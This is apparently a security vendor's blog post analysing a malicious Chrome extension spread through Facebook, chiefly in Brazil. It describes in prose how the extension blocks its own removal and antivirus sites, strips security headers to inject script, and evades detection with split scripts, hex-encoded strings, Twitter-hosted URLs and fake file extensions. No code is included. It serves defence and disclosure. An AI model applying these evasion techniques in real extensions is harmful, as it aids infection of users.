Malicious browser extensions bring about security risks as these often lead to system infection and unwanted spamming on Facebook. Based on our data, these attacks have notably affected users in Brazil.
We have previously reported that cybercriminals are putting malicious browsers in the official Chrome Web store. We also came across malware that bypasses a Google security feature checks third party extensions. For this blog entry, we performed an in-depth analysis of malicious Chrome browser extension and its evasion tactics, after receiving samples in from Facebook. Facebook’s Security team conducts their own malware research and they regularly collaborate with Trend Micro to keep their service safe.
The Ins and Outs of the Browser Plugin
The malicious Chrome plugin (detected as BREX_KILIM.LL) is composed of two files, manifest.json and background.js. The file manifest.json will inform Chrome where to load background.js:
Figure 1. Two files behind the malicious plugin
The file background.js will execute the following routines:
1. It prevents the removal of the malicious plugin. If users open a tab to chrome://extensions to check for malicious browser extensions, the plugin will close this tab immediately.
Figure 2. Code showing the closing of said tab
2. It prevents access to antivirus websites. Any attempts to visit antivirus software websites will be blocked.
Figure 3. Code showing the blocking of specific sites
Figure 4. Notification showing access was blocked by the extension
3. It removes the security option from HTTP response header. This security option is typically used to avoid cross site scripting attacks. The plugin removes this as it will will inject script that does not belong to Facebook.
Figure 5. Code removing portions of the HTTP header
To avoid having their extensions detected and removed from computers, cybercriminals are using the following evasion methods:
1. They use malicious multi-script files that work together.
Figure 7. Malicious plugin using multi-script
The malicious behavior is separated into multiple files. If each script file is analyzed independently, the overall malicious behavior may not be spotted and the files may be (mistakenly) thought to be clean.
Hackers use HEX to encode strings as seen in the screenshot below:
Figure 8. Encoded strings via Hex
After decoding the Hex string, they appear like in the screenshot below, showing that it’s the same as the original. This behavior helps to avoid detection by security products.
Figure 9. Decoded string
Figure 10. A good domain used by the malicious plugin
4. They use Twitter to hide malicious URLs.
Figure 11. Code communicating with Twitter servers
Figure 12. Twitter profile that houses the URL
5. They use fake file extensions.
Figure 13. The plugin uses .DLL as its supposed extension
Infections and Protection
Based on our data starting from May 2014 onwards, Trend Micro HouseCall has helped about 1,000,000 users whose computers have been infected by malicious browser extensions. The top affected countries are mostly located in the Latin American region, such as Brazil, Mexico, Colombia, and Peru.
Figure 14. Top affected countries
We strongly advise users to avoid clicking links from messages, even if they appear to come from your friends. Users can also opt to use Trend Micro HouseCall to secure their systems from online threats, including those that may leverage or abuse Facebook. Trend Micro and Facebook are working closely together to combat this threat.
Below is the SHA1 hash of the malicious file: